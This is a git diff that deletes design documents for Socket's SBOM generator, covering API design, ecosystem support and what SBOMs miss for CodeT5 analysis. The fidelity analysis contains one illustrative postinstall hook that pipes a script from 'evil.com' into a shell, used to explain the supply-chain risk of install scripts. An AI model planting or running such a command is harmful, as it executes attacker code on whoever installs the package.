SBOM as Canonical Format? - -### 1. Industry Standard -- **CycloneDX v1.5** is widely adopted security standard -- Compatible with: Grype, Syft, Trivy, Dependency-Track, OWASP tools -- Can be consumed by external security tools - -### 2. Single Source of Truth -- Parse lockfiles once → Generate SBOM -- Convert SBOM → Multiple formats (CodeT5, JSON, XML, etc.) -- No duplicate parsing logic to maintain - -### 3. Flexibility -Generate different CodeT5 formats for different tasks: -```typescript -const sbom = await generateSbom('./project') // Parse once -const enriched = await enrichSbomWithSocket(sbom, { apiToken }) - -// Generate task-specific formats -const securityPrompt = formatSbomForCodeT5(enriched, { task: 'security-analysis' }) -const vulnPrompt = formatSbomForCodeT5(enriched, { task: 'vulnerability-detection' }) -const auditPrompt = formatSbomForCodeT5(enriched, { task: 'dependency-audit' }) -``` - -### 4. Cacheability -- Store SBOM in database/cache -- Regenerate CodeT5 format on-demand -- No need to re-parse lockfiles - -### 5. Debuggability -- Inspect full SBOM to troubleshoot issues -- Validate against CycloneDX schema -- Audit what data was sent to CodeT5 - -### 6. Evolution Path -- Add new enrichment sources (NVD, GitHub Advisory) -- Add new output formats (SPDX, custom) -- Add new optimization strategies - -## Format Comparison - -| Format | Size | Use Case | Audience | -|--------|------|----------|----------| -| **Lockfiles** | 50,000 tokens | Source data | Package managers | -| **SBOM (CycloneDX)** | ~50KB (12,500 tokens) | Standard interchange | Security tools, APIs | -| **Enriched SBOM** | ~75KB (18,750 tokens) | + Security data | Internal processing | -| **CodeT5 Format** | ~1KB (300 tokens) | ML analysis | CodeT5 model | - -**Token reduction: Raw → SBOM = 4x, Raw → CodeT5 = 166x** - -## API Design Options - -### Option A: SBOM-Only API (Standard) - -**Endpoint:** -```typescript -POST /api/v1/sbom/analyze -Content-Type: application/vnd.cyclonedx+json - -{ - "bomFormat": "CycloneDX", - "specVersion": "1.5", - "components": [...], - "dependencies": [...] -} -``` - -**Server Processing:** -1. Receive SBOM -2. Enrich with Socket data (if not already enriched) -3. Convert to CodeT5 format -4. Send to CodeT5 model -5. Return analysis - -**PROS:** -- ✅ Standard format, widely supported -- ✅ Other tools can send SBOMs -- ✅ Can validate against CycloneDX schema -- ✅ Easy to debug (inspect SBOM) - -**CONS:** -- ⚠️ Larger payload (~50KB) -- ⚠️ Conversion overhead on server - -### Option B: CodeT5-Optimized API (Fast) - -**Endpoint:** -```typescript -POST /api/v1/codet5/analyze -Content-Type: application/json - -{ - "task": "security-analysis", - "project": { - "name": "my-app", - "version": "1.0.0" - }, - "criticalIssues": [...], - "components": [...] // Minimal data -} -``` - -**Server Processing:** -1. Receive pre-optimized format -2. Send directly to CodeT5 model -3. Return analysis - -**PROS:** -- ✅ Small payload (~1KB) -- ✅ Fast transmission -- ✅ No conversion overhead - -**CONS:** -- ❌ Non-standard format -- ❌ Tightly coupled to CodeT5 -- ❌ Hard to debug (no full SBOM) -- ❌ Can't use with other tools - -### Option C: Hybrid API (Recommended) ✅ - -**Accept both formats:** - -```typescript -// Standard format for integrations -POST /api/v1/sbom/analyze -Content-Type: application/vnd.cyclonedx+json -{ "bomFormat": "CycloneDX", ... } - -// Optimized format for performance -POST /api/v1/codet5/analyze -Content-Type: application/json -{ "task": "security-analysis", ... } - -// Unified endpoint with auto-detection -POST /api/v1/analyze -Content-Type: application/vnd.cyclonedx+json OR application/json -{ ... } -``` - -**PROS:** -- ✅ Flexibility for different clients -- ✅ Standard format for integrations -- ✅ Optimized format for CLI/performance -- ✅ Future-proof - -**CONS:** -- ⚠️ More endpoints to maintain - -## Client-Side Flow - -### Flow 1: Socket CLI (Local Analysis) - -```typescript -// 1. Generate SBOM locally -const sbom = await generateSbom('./project') - -// 2. Enrich with Socket API -const enriched = await enrichSbomWithSocket(sbom, { apiToken }) - -// 3. Format for CodeT5 -const prompt = formatSbomForCodeT5(enriched, { task: 'security-analysis' }) - -// 4. Send optimized format to CodeT5 API (small payload) -const analysis = await fetch('/api/v1/codet5/analyze', { - method: 'POST', - body: JSON.stringify({ prompt, task: 'security-analysis' }) -}) -``` - -**Benefits:** -- Small API payload (1KB vs 50KB) -- Client controls optimization -- Can cache SBOM locally - -### Flow 2: CI/CD Integration (Standard) - -```typescript -// 1. Generate SBOM locally -const sbom = await generateSbom('./project') - -// 2. Send full SBOM to API (standard format) -const result = await fetch('/api/v1/sbom/analyze', { - method: 'POST', - headers: { 'Content-Type': 'application/vnd.cyclonedx+json' }, - body: JSON.stringify(sbom) -}) - -// Server handles enrichment and optimization -``` - -**Benefits:** -- Standard format, easy to integrate -- Server handles all processing -- Can use existing SBOM tools - -### Flow 3: External Tools (Standard) - -```bash -# Generate SBOM with other tools -cdxgen . -o sbom.json - -# Send to Socket API -curl -X POST https://api.socket.dev/v1/sbom/analyze \ - -H "Content-Type: application/vnd.cyclonedx+json" \ - -d @sbom.json -``` - -**Benefits:** -- Works with existing tooling -- No Socket CLI required -- Standard CycloneDX format - -## Conversion Performance - -### SBOM → CodeT5 Conversion - -**Benchmarks:** -- Parse SBOM: ~5ms -- Prioritize components: ~2ms -- Format output: ~3ms -- **Total: ~10ms** - -**Negligible overhead compared to:** -- Parsing lockfiles: ~500ms -- Socket API enrichment: ~2,000ms -- CodeT5 model inference: ~3,000ms - -### Caching Strategy - -```typescript -// Cache SBOM for fast regeneration -const cacheKey = `sbom:${projectPath}:${lockfileHash}` - -// Check cache -let sbom = await cache.get(cacheKey) -if (!sbom) { - sbom = await generateSbom(projectPath) - await cache.set(cacheKey, sbom, { ttl: 3600 }) -} - -// Convert to CodeT5 format (fast) -const prompt = formatSbomForCodeT5(sbom, { task }) -``` - -## Alternative Considered: Separate Generators - -### Why NOT Generate Both Separately - -```typescript -// ❌ BAD: Two separate parsers -const sbom = await generateSbom('./project') -const codeT5Data = await generateCodeT5Format('./project') -``` - -**Problems:** -1. **Duplicate parsing** - Parse lockfiles twice (expensive) -2. **Two sources of truth** - Can diverge, hard to maintain -3. **Not reusable** - CodeT5 format only works for CodeT5 -4. **Maintenance burden** - Keep two parsers in sync -5. **More code** - More complexity, more bugs - -## Implementation Examples - -### Example 1: CLI Tool - -```typescript -#!/usr/bin/env node -import { generateSbom, enrichSbomWithSocket, formatSbomForCodeT5 } from '@socketsecurity/sbom-generator' - -async function main() { - // 1. Generate SBOM - console.log('Generating SBOM...') - const sbom = await generateSbom(process.cwd()) - - // 2. Enrich with Socket - console.log('Enriching with Socket data...') - const enriched = await enrichSbomWithSocket(sbom, { - apiToken: process.env.SOCKET_API_TOKEN - }) - - // 3. Format for CodeT5 - console.log('Optimizing for CodeT5...') - const prompt = formatSbomForCodeT5(enriched, { - task: 'security-analysis' - }) - - // 4. Send to API (small payload) - console.log('Sending to CodeT5 API...') - const response = await fetch('https://api.socket.dev/v1/codet5/analyze', { - method: 'POST', - headers: { 'Content-Type': 'application/json' }, - body: JSON.stringify({ prompt, task: 'security-analysis' }) - }) - - const analysis = await response.json() - console.log(analysis) -} - -main() -``` - -### Example 2: API Server - -```typescript -import express from 'express' -import { enrichSbomWithSocket, formatSbomForCodeT5 } from '@socketsecurity/sbom-generator' - -const app = express() - -// Accept standard SBOM format -app.post('/api/v1/sbom/analyze', async (req, res) => { - const sbom = req.body // CycloneDX SBOM - - // Enrich - const enriched = await enrichSbomWithSocket(sbom, { apiToken }) - - // Convert to CodeT5 format - const prompt = formatSbomForCodeT5(enriched, { - task: req.query.task || 'security-analysis' - }) - - // Send to CodeT5 - const analysis = await codeT5.generate(prompt) - - res.json({ analysis }) -}) - -// Accept pre-optimized format -app.post('/api/v1/codet5/analyze', async (req, res) => { - const { prompt } = req.body - - // Send directly to CodeT5 - const analysis = await codeT5.generate(prompt) - - res.json({ analysis }) -}) -``` - -## Recommendation - -✅ **Keep current design: SBOM as canonical format, CodeT5 as derived format** - -### Implement Hybrid API: -1. **Primary endpoint**: Accept CycloneDX SBOM (standard) -2. **Optimized endpoint**: Accept CodeT5-formatted data (performance) -3. **Server-side conversion**: SBOM → CodeT5 on server (flexible) - -### Benefits: -- ✅ Standard format for interoperability -- ✅ Optimized format for performance -- ✅ Single source of truth (SBOM) -- ✅ Flexible, extensible, maintainable - -### Trade-offs Accepted: -- ⚠️ 10ms conversion overhead (negligible) -- ⚠️ Larger intermediate format (cacheable) - -This design provides the best balance of **standardization**, **performance**, and **flexibility**. diff --git a/docs/sbom-generator/ecosystems.md b/docs/sbom-generator/ecosystems.md deleted file mode 100644 index 40f955527..000000000 --- a/docs/sbom-generator/ecosystems.md +++ /dev/null @@ -1,211 +0,0 @@ -# SBOM Generator - Ecosystem Support - -Based on **depscan** ecosystem definitions from `/workspaces/lib/dist/ecosystems/`. - -## Complete Ecosystem List - -| Ecosystem | Display Name | Registry | PURL Type | Parse Strategy | Priority | -|-----------|--------------|----------|-----------|----------------|----------| -| **npm** | npm | npmjs.org | npm | Parse lockfiles | ✅ Tier 1 | -| **pypi** | PyPI | pypi.org | pypi | Parse lockfiles | ⏳ Tier 2 | -| **cargo** | Cargo | crates.io | cargo | Parse Cargo.lock | ⏳ Tier 2 | -| **go** | Go | proxy.golang.org | golang | Parse go.mod/go.sum | ⏳ Tier 2 | -| **maven** | Maven | repo1.maven.org | maven | Parse pom.xml OR convert gradle | ⏳ Tier 2 | -| **rubygems** | Rubygems | rubygems.org | gem | Parse Gemfile.lock | ⏳ Tier 2 | -| **nuget** | NuGet | nuget.org | nuget | Parse .csproj/packages.config | ⏳ Tier 2 | -| **actions** | GitHub Actions | github.com | github | Parse workflow YAML | ⏳ Tier 3 | -| **huggingface** | Hugging Face | huggingface.co | huggingface | API-based | ⏳ Tier 3 | -| **chrome** | Chrome | chromewebstore.google.com | chrome | API-based | ⏳ Tier 3 | -| **openvsx** | OpenVSX | open-vsx.org | vscode | API-based | ⏳ Tier 3 | - -**Note on Gradle**: Gradle is a **build tool**, not a separate ecosystem. Gradle projects publish to Maven repositories (repo1.maven.org), so they use the **maven** ecosystem. Socket-CLI already has gradle-to-maven conversion built-in (`socket manifest gradle`). - -## Implementation Strategy - -### Tier 1 - Implemented (1/11) -- ✅ **npm** - Full support for package-lock.json, yarn.lock, pnpm-lock.yaml - -### Tier 2 - High Priority (6/11) -Parse-first strategy for all traditional package managers: - -1. **pypi** (Python) - - **Files**: requirements.txt, Pipfile.lock, poetry.lock - - **Parser**: TOML (@iarna/toml), JSON - - **Priority**: High (2nd most common after npm) - -2. **cargo** (Rust) - - **Files**: Cargo.toml, Cargo.lock - - **Parser**: TOML (@iarna/toml) - - **Priority**: High (growing ecosystem) - -3. **go** (Go) - - **Files**: go.mod, go.sum - - **Parser**: Custom text format - - **Priority**: High (enterprise usage) - -4. **maven** (Java/JVM) - - **Files**: pom.xml, build.gradle, build.gradle.kts - - **Parser**: XML (fast-xml-parser) for pom.xml, gradle conversion for gradle files - - **Priority**: High (enterprise usage) - - **Note**: Gradle is a build tool that publishes to Maven repositories. Socket-CLI already has gradle support that converts to pom.xml format - -5. **rubygems** (Ruby) - - **Files**: Gemfile.lock - - **Parser**: Custom text format - - **Priority**: Medium - -6. **nuget** (.NET) - - **Files**: packages.config, .csproj - - **Parser**: XML (fast-xml-parser) - - **Priority**: Medium (enterprise usage) - -### Tier 3 - Additional Ecosystems (4/11) -API-based or special-case ecosystems: - -1. **actions** (GitHub Actions) - - **Files**: .github/workflows/*.yml - - **Parser**: YAML - - **Priority**: Low (workflows, not traditional packages) - -2. **huggingface** (ML Models) - - **Strategy**: API-based (huggingface.co API) - - **Priority**: Low (specialized use case) - -3. **chrome** (Browser Extensions) - - **Strategy**: API-based (Chrome Web Store API) - - **Priority**: Low (specialized use case) - -4. **openvsx** (VS Code Extensions) - - **Strategy**: API-based (open-vsx.org API) - - **Priority**: Low (specialized use case) - -## Lockfile Formats by Ecosystem - -### Text-Based (Custom Parsers) -- **npm/yarn**: yarn.lock (custom format via @yarnpkg/parsers) -- **go**: go.mod, go.sum (simple key-value text) -- **rubygems**: Gemfile.lock (custom Ruby-specific format) - -### JSON -- **npm**: package-lock.json -- **pypi**: Pipfile.lock - -### YAML -- **npm/pnpm**: pnpm-lock.yaml -- **actions**: workflow files (.github/workflows/*.yml) - -### TOML -- **pypi**: poetry.lock -- **cargo**: Cargo.lock - -### XML -- **maven**: pom.xml -- **nuget**: packages.config, .csproj - -### API-Based (No Lockfiles) -- **huggingface**: Models/datasets via huggingface.co API -- **chrome**: Extensions via Chrome Web Store API -- **openvsx**: Extensions via open-vsx.org API - -## Feature Matrix - -Based on depscan's feature flags: - -| Ecosystem | Alerts | AI Summary | Dependencies | Search | Scores | Show in Footer | -|-----------|--------|------------|--------------|--------|--------|----------------| -| npm | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | -| pypi | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| cargo | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | -| go | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| maven | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| rubygems | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| nuget | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| actions | ✅ | ❌ | ✅ | ✅ | ✅ | ❌ | -| huggingface | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | -| chrome | ✅ | ❌ | ❌ | ✅ | ❌ | ❌ | -| openvsx | ✅ | ❌ | ❌ | ✅ | ✅ | ❌ | - -**Key Insights**: -- All ecosystems support alerts and search -- npm and cargo get AI summaries (highest priority ecosystems) -- Most ecosystems support dependency tracking -- Chrome has minimal feature support (extensions are simpler) - -## Socket.dev Priority - -Based on depscan features and ecosystem importance: - -### Must-Have (Tier 1) -1. **npm** ✅ - Implemented - - Most popular JavaScript ecosystem - - Full feature support including AI summaries - -### Should-Have (Tier 2) -2. **pypi** - Python packages - - 2nd largest ecosystem - - Critical for ML/data science - -3. **cargo** - Rust crates - - AI summary support - - Growing security-conscious community - -4. **go** - Go modules - - Enterprise adoption - - Security-focused language - -5. **maven** - Java/JVM packages - - Enterprise dominance - - Large existing codebase - -### Nice-to-Have (Tier 2-3) -6. **rubygems** - Ruby gems -7. **nuget** - .NET packages - -### Future Consideration (Tier 3) -8. **actions** - GitHub Actions -9. **huggingface** - ML models -10. **chrome** - Browser extensions -11. **openvsx** - VS Code extensions - -## Implementation Roadmap - -### Phase 1 (Weeks 1-2) ✅ COMPLETE -- ✅ npm parser with full lockfile support -- ✅ Socket enrichment integration -- ✅ CodeT5 formatter - -### Phase 2 (Weeks 3-4) -- ⏳ pypi parser (requirements.txt, Pipfile.lock, poetry.lock) -- ⏳ cargo parser (Cargo.toml, Cargo.lock) - -### Phase 3 (Weeks 5-6) -- ⏳ go parser (go.mod, go.sum) -- ⏳ maven parser (pom.xml) - -### Phase 4 (Weeks 7-8) -- ⏳ rubygems parser (Gemfile.lock) -- ⏳ nuget parser (packages.config, .csproj) - -### Phase 5 (Future) -- ⏳ actions parser (workflow YAML) -- ⏳ API-based parsers (huggingface, chrome, openvsx) - -## Dependencies Required - -### Currently Used -- ✅ `@yarnpkg/parsers` - Parse yarn.lock -- ✅ `@iarna/toml` - Parse TOML (cargo, pypi) -- ✅ `fast-xml-parser` - Parse XML (maven, nuget) -- ✅ `yaml` - Parse YAML (pnpm, actions) - -### Future Needs -- ⏳ Custom go.mod/go.sum parser (simple text format) -- ⏳ Custom Gemfile.lock parser (Ruby-specific format) -- ⏳ API clients for huggingface, chrome, openvsx - -## References - -- **depscan ecosystem types**: `/workspaces/lib/dist/ecosystems/types.d.ts` -- **depscan ecosystem constants**: `/workspaces/lib/dist/ecosystems/constants.d.ts` -- **CycloneDX spec**: https://cyclonedx.org/docs/1.5/json/ -- **Package URL (PURL) spec**: https://github.com/package-url/purl-spec diff --git a/docs/sbom-generator/fidelity-analysis.md b/docs/sbom-generator/fidelity-analysis.md deleted file mode 100644 index 37790688c..000000000 --- a/docs/sbom-generator/fidelity-analysis.md +++ /dev/null @@ -1,617 +0,0 @@ -# SBOM Fidelity Analysis - What Might CodeT5 Miss? - -## Question: Does SBOM capture everything CodeT5 needs for smart analysis? - -**TL;DR: SBOM captures ~80% of what's needed. The missing 20% can be added via CycloneDX `properties` field.** - ---- - -## What SBOM Captures Well ✅ - -CycloneDX SBOM includes: -- ✅ Component names, versions, PURLs -- ✅ Dependency graph (who depends on who) -- ✅ Licenses -- ✅ Hashes (integrity) -- ✅ External references (URLs) -- ✅ Vulnerabilities (with Socket enrichment) -- ✅ Scope (required/optional/excluded) -- ✅ Properties (key-value pairs for custom metadata) - -**This covers the basics for security analysis.** - ---- - -## What SBOM Might Miss ⚠️ - -### 1. **Package Manager Metadata** - -#### Missing Context: -```json -// package.json -{ - "dependencies": { - "axios": "^0.21.0" // ← Version RANGE - } -} - -// package-lock.json (resolved) -{ - "axios": { - "version": "0.21.1", // ← Actual RESOLVED version - "resolved": "https://registry.npmjs.org/axios/-/axios-0.21.1.tgz", - "integrity": "sha512-...", - "requires": { - "follow-redirects": "^1.10.0" // ← Transitive constraint - } - } -} -``` - -**SBOM representation:** -```json -{ - "name": "axios", - "version": "0.21.1", // ✅ Has resolved version - "purl": "pkg:npm/axios@0.21.1" -} -``` - -**Missing:** -- ❌ Original version range (`^0.21.0`) from package.json -- ❌ Why this specific version was chosen (resolution algorithm) -- ❌ Alternative versions that could satisfy the range - -**Why CodeT5 might care:** -- Version range might allow vulnerable version -- Recent breaking change might explain issues -- Range allows automatic security updates - -**Solution:** Add to properties: -```json -{ - "name": "axios", - "version": "0.21.1", - "properties": [ - { "name": "socket:versionRange", "value": "^0.21.0" }, - { "name": "socket:requestedBy", "value": "my-app" }, - { "name": "socket:rangeAllowsVulnerable", "value": "true" } - ] -} -``` - ---- - -### 2. **Install Scripts (Security Critical!)** - -#### Missing Context: -```json -// package.json -{ - "name": "suspicious-package", - "scripts": { - "postinstall": "curl https://evil.com/steal.sh | sh" // ← DANGER! - } -} -``` - -**SBOM representation:** -```json -{ - "name": "suspicious-package", - "version": "1.0.0" -} -``` - -**Missing:** -- ❌ Has install scripts -- ❌ What scripts do (could be malicious) -- ❌ Whether scripts were executed - -**Why CodeT5 might care:** -- **Install scripts are #1 supply chain attack vector** -- CodeT5 should warn about packages with install scripts -- Especially important for transitive dependencies - -**Solution:** Add to properties: -```json -{ - "name": "suspicious-package", - "version": "1.0.0", - "properties": [ - { "name": "socket:hasInstallScripts", "value": "true" }, - { "name": "socket:installScriptCommands", "value": "postinstall" }, - { "name": "socket:installScriptRisk", "value": "high" } - ] -} -``` - -**Socket already detects this!** Just need to include in SBOM. - ---- - -### 3. **Peer Dependency Mismatches** - -#### Missing Context: -```json -// react-router (requires React 16+) -{ - "peerDependencies": { - "react": ">=16.8.0" - } -} - -// But project uses React 15 -{ - "dependencies": { - "react": "15.0.0" // ← Mismatch! - } -} -``` - -**SBOM representation:** -```json -{ - "dependencies": [ - { "ref": "pkg:npm/react-router@5.0.0", "dependsOn": ["pkg:npm/react@15.0.0"] } - ] -} -``` - -**Missing:** -- ❌ Peer dependency requirements -- ❌ Whether requirements are satisfied -- ❌ Potential runtime errors - -**Why CodeT5 might care:** -- Peer dependency mismatches cause runtime errors -- Common source of bugs -- Hard to debug - -**Solution:** Add to dependencies: -```json -{ - "ref": "pkg:npm/react-router@5.0.0", - "dependsOn": ["pkg:npm/react@15.0.0"], - "properties": [ - { "name": "socket:peerDependencyMismatch", "value": "true" }, - { "name": "socket:requiredPeerVersion", "value": ">=16.8.0" }, - { "name": "socket:actualPeerVersion", "value": "15.0.0" } - ] -} -``` - ---- - -### 4. **Duplicate Packages (Bloat & Security)** - -#### Missing Context: -``` -node_modules/ - ├── axios@0.21.0 ← App uses this - └── foo/ - └── node_modules/ - └── axios@0.19.0 ← Transitive dep uses old version -``` - -**SBOM representation:** -```json -{ - "components": [ - { "name": "axios", "version": "0.21.0" }, - { "name": "axios", "version": "0.19.0" } - ] -} -``` - -**Missing:** -- ❌ That these are duplicates of same package -- ❌ Why duplication happened -- ❌ Impact on bundle size -- ❌ Which version is actually used by each dependent - -**Why CodeT5 might care:** -- Multiple versions = multiple attack surfaces -- Old version might have known vulnerabilities -- Bundle size impact -- Could cause subtle bugs - -**Solution:** Add to properties: -```json -{ - "name": "axios", - "version": "0.19.0", - "properties": [ - { "name": "socket:isDuplicate", "value": "true" }, - { "name": "socket:newerVersionExists", "value": "0.21.0" }, - { "name": "socket:duplicateReason", "value": "transitive version mismatch" }, - { "name": "socket:installPath", "value": "node_modules/foo/node_modules/axios" } - ] -} -``` - ---- - -### 5. **Git/File Dependencies (Bypass Security)** - -#### Missing Context: -```json -// package.json -{ - "dependencies": { - "my-private-lib": "git+https://github.com/me/private.git#v1.0.0", - "local-utils": "file:../utils" - } -} -``` - -**SBOM representation:** -```json -{ - "name": "my-private-lib", - "version": "1.0.0", // ← Loses git context - "externalReferences": [ - { "url": "https://github.com/me/private.git", "type": "vcs" } - ] -} -``` - -**Missing:** -- ❌ That this is a git dependency (not from registry) -- ❌ Specific commit SHA (security critical!) -- ❌ That this bypasses npm security scanning -- ❌ File dependencies (completely untracked) - -**Why CodeT5 might care:** -- **Git deps bypass security scanning** - Major risk! -- No vulnerability database for git deps -- Mutable (branch/tag can change) -- File deps are completely unaudited - -**Solution:** Add to properties: -```json -{ - "name": "my-private-lib", - "version": "1.0.0", - "properties": [ - { "name": "socket:dependencyType", "value": "git" }, - { "name": "socket:gitUrl", "value": "https://github.com/me/private.git" }, - { "name": "socket:gitCommit", "value": "abc123..." }, - { "name": "socket:bypassesSecurityScan", "value": "true" } - ] -} -``` - ---- - -### 6. **Bundled Dependencies (Hidden Components)** - -#### Missing Context: -```json -// package.json -{ - "name": "my-package", - "bundledDependencies": ["native-addon"] -} -``` - -**SBOM representation:** -```json -{ - "name": "my-package", - "version": "1.0.0" -} -``` - -**Missing:** -- ❌ That this package bundles other dependencies -- ❌ What's inside the bundle (hidden from dependency graph) -- ❌ Bundled deps don't appear in lockfile - -**Why CodeT5 might care:** -- Bundled deps are hidden from scanning -- Might contain vulnerabilities -- Supply chain obfuscation - -**Solution:** Add to properties: -```json -{ - "name": "my-package", - "version": "1.0.0", - "properties": [ - { "name": "socket:hasBundledDeps", "value": "true" }, - { "name": "socket:bundledDeps", "value": "native-addon" } - ] -} -``` - ---- - -### 7. **Package Manager Configuration** - -#### Missing Context: -```ini -# .npmrc -registry=https://custom-registry.company.com -@myorg:registry=https://npm.pkg.github.com -``` - -**SBOM representation:** -```json -{ - "name": "@myorg/internal-lib", - "version": "1.0.0" -} -``` - -**Missing:** -- ❌ Custom registry used -- ❌ Private registry (might not be scanned by Socket) -- ❌ Authentication requirements - -**Why CodeT5 might care:** -- Private registry packages might not be scanned -- Custom registries could be compromised -- Supply chain visibility gaps - -**Solution:** Add to metadata: -```json -{ - "metadata": { - "properties": [ - { "name": "socket:customRegistry", "value": "https://custom-registry.company.com" }, - { "name": "socket:scopedRegistries", "value": "@myorg:https://npm.pkg.github.com" } - ] - } -} -``` - ---- - -### 8. **Resolutions/Overrides (Force Versions)** - -#### Missing Context: -```json -// package.json (Yarn/pnpm) -{ - "resolutions": { - "axios": "1.6.0" // ← Force ALL axios to this version - } -} - -// package.json (npm 8+) -{ - "overrides": { - "axios": "1.6.0" - } -} -``` - -**SBOM representation:** -```json -{ - "name": "axios", - "version": "1.6.0" -} -``` - -**Missing:** -- ❌ That version was forced (not naturally resolved) -- ❌ Why override was needed (probably security patch) -- ❌ What versions were overridden - -**Why CodeT5 might care:** -- Overrides indicate known issues -- Forced version might break things -- Shows active security management - -**Solution:** Add to properties: -```json -{ - "name": "axios", - "version": "1.6.0", - "properties": [ - { "name": "socket:isOverridden", "value": "true" }, - { "name": "socket:overrideReason", "value": "security-patch" }, - { "name": "socket:originalVersionRange", "value": "^0.21.0" } - ] -} -``` - ---- - -### 9. **Transitive Dependency Chain Context** - -#### Missing Context: -``` -my-app - └── express@4.18.0 - └── body-parser@1.20.0 - └── qs@6.10.0 ← Vulnerable! -``` - -**SBOM representation:** -```json -{ - "dependencies": [ - { "ref": "my-app", "dependsOn": ["express"] }, - { "ref": "express", "dependsOn": ["body-parser"] }, - { "ref": "body-parser", "dependsOn": ["qs"] } - ] -} -``` - -**Missing:** -- ❌ Full dependency chain (my-app → express → body-parser → qs) -- ❌ That qs is transitive (not directly depended on) -- ❌ Can't easily answer: "Why is this vulnerable package here?" - -**Why CodeT5 might care:** -- Need to explain: "axios@0.21.0 is pulled in by express → body-parser → axios" -- Helps user understand: "Update body-parser to fix" -- Chain length indicates maintenance burden - -**Solution:** Pre-compute and add to properties: -```json -{ - "name": "qs", - "version": "6.10.0", - "properties": [ - { "name": "socket:dependencyDepth", "value": "3" }, - { "name": "socket:dependencyChain", "value": "my-app → express → body-parser → qs" }, - { "name": "socket:isTransitive", "value": "true" }, - { "name": "socket:directParent", "value": "body-parser" }, - { "name": "socket:rootParent", "value": "express" } - ] -} -``` - ---- - -### 10. **Temporal/Historical Context** - -#### Missing Context: -``` -When was this dependency added? -How long has it been using this version? -How often do they update dependencies? -Are they behind on updates? -``` - -**SBOM representation:** -```json -{ - "name": "axios", - "version": "0.21.0", - "timestamp": "2024-01-15T10:00:00Z" // ← SBOM generation time -} -``` - -**Missing:** -- ❌ When dependency was first added to project -- ❌ How long they've been on this version -- ❌ Update frequency/patterns -- ❌ How far behind latest version - -**Why CodeT5 might care:** -- Old dependencies = higher security risk -- Infrequent updates = maintenance burden -- Far behind latest = technical debt - -**Solution:** Requires git history analysis (separate tool): -```json -{ - "name": "axios", - "version": "0.21.0", - "properties": [ - { "name": "socket:addedDate", "value": "2023-01-15" }, - { "name": "socket:daysSinceUpdate", "value": "365" }, - { "name": "socket:versionsBehind", "value": "15" }, - { "name": "socket:latestVersion", "value": "1.6.0" } - ] -} -``` - ---- - -## Summary: What's Missing - -| Category | Impact | Solution | Priority | -|----------|--------|----------|----------| -| **Install scripts** | 🔴 High | Add properties | Critical | -| **Git/File deps** | 🔴 High | Add properties | Critical | -| **Version ranges** | 🟡 Medium | Add properties | High | -| **Peer dep mismatches** | 🟡 Medium | Add properties | High | -| **Duplicates** | 🟡 Medium | Add properties | Medium | -| **Resolutions** | 🟡 Medium | Add properties | Medium | -| **Bundled deps** | 🟡 Medium | Add properties | Medium | -| **Registry config** | 🟢 Low | Add metadata | Low | -| **Dependency chains** | 🟢 Low | Pre-compute | Low | -| **Temporal context** | 🟢 Low | Git analysis | Future | - ---- - -## Recommendation: Extend SBOM with Socket Properties - -### Add Custom Properties to CycloneDX SBOM: - -```typescript -interface SocketComponentProperties { - // Security-critical - 'socket:hasInstallScripts'?: 'true' | 'false' - 'socket:installScriptRisk'?: 'low' | 'medium' | 'high' | 'critical' - 'socket:dependencyType'?: 'registry' | 'git' | 'file' | 'bundled' - 'socket:bypassesSecurityScan'?: 'true' | 'false' - - // Version metadata - 'socket:versionRange'?: string // Original range from package.json - 'socket:isOverridden'?: 'true' | 'false' - 'socket:latestVersion'?: string - - // Dependency context - 'socket:isDuplicate'?: 'true' | 'false' - 'socket:dependencyDepth'?: string // "3" - 'socket:isTransitive'?: 'true' | 'false' - - // Peer dependencies - 'socket:peerDependencyMismatch'?: 'true' | 'false' - 'socket:requiredPeerVersion'?: string -} -``` - -### Implementation: - -```typescript -// In npm parser -const component: Component = { - name: pkg.name, - version: pkg.version, - purl: `pkg:npm/${pkg.name}@${pkg.version}`, - properties: [ - // Add Socket-specific metadata - { name: 'socket:hasInstallScripts', value: hasInstallScripts(pkg) ? 'true' : 'false' }, - { name: 'socket:versionRange', value: getVersionRange(pkg.name, packageJson) }, - { name: 'socket:dependencyType', value: getDependencyType(pkg) }, - { name: 'socket:isDuplicate', value: isDuplicate(pkg, allPackages) ? 'true' : 'false' }, - ].filter(Boolean) -} -``` - -### CodeT5 Formatter Enhancement: - -```typescript -export function formatSbomForCodeT5(sbom: EnrichedSbom): string { - const lines = ['CRITICAL SECURITY ISSUES:'] - - for (const component of sbom.components) { - // Check Socket properties - const hasInstallScripts = getProperty(component, 'socket:hasInstallScripts') - const dependencyType = getProperty(component, 'socket:dependencyType') - const bypassesScan = getProperty(component, 'socket:bypassesSecurityScan') - - if (hasInstallScripts === 'true') { - lines.push(`⚠️ ${component.name}@${component.version} has install scripts (potential supply chain risk)`) - } - - if (dependencyType === 'git' && bypassesScan === 'true') { - lines.push(`🔴 ${component.name}@${component.version} is from git (bypasses security scanning)`) - } - } - - return lines.join('\n') -} -``` - ---- - -## Conclusion - -✅ **SBOM can capture everything CodeT5 needs via `properties` field** - -**Steps:** -1. ✅ Current SBOM captures 80% (names, versions, dependencies, vulnerabilities) -2. ⏳ Add Socket properties for missing 20% (install scripts, git deps, version ranges) -3. ⏳ Enhance CodeT5 formatter to use Socket properties -4. ⏳ Document Socket property schema - -**No architectural change needed - just enrich SBOM with more metadata.** diff --git a/docs/sbom-generator/implementation.md b/docs/sbom-generator/implementation.md deleted file mode 100644 index b012680fe..000000000 --- a/docs/sbom-generator/implementation.md +++ /dev/null @@ -1,280 +0,0 @@ -# SBOM Generator - Implementation Status - -Type-safe CycloneDX SBOM generator for multi-ecosystem projects with Socket.dev integration and CodeT5 optimization. - -## ✅ Completed (Ready to Use) - -### Core Architecture -- ✅ **Package structure** - Complete with proper exports and dependencies -- ✅ **CycloneDX v1.5 types** - Full TypeScript definitions (500+ lines) -- ✅ **Parser interface** - Base types for ecosystem-specific parsers -- ✅ **Main generator** - Auto-detection and SBOM combination logic - -### Parsers -- ✅ **npm parser** - Full support for: - - package.json (project metadata) - - package-lock.json (npm v5+, both v1 and v2 formats) - - yarn.lock (via @yarnpkg/parsers) - - pnpm-lock.yaml (via yaml parser) - - Dependency graph building - - Dev/optional dependency filtering - - Package URL (PURL) generation - -### 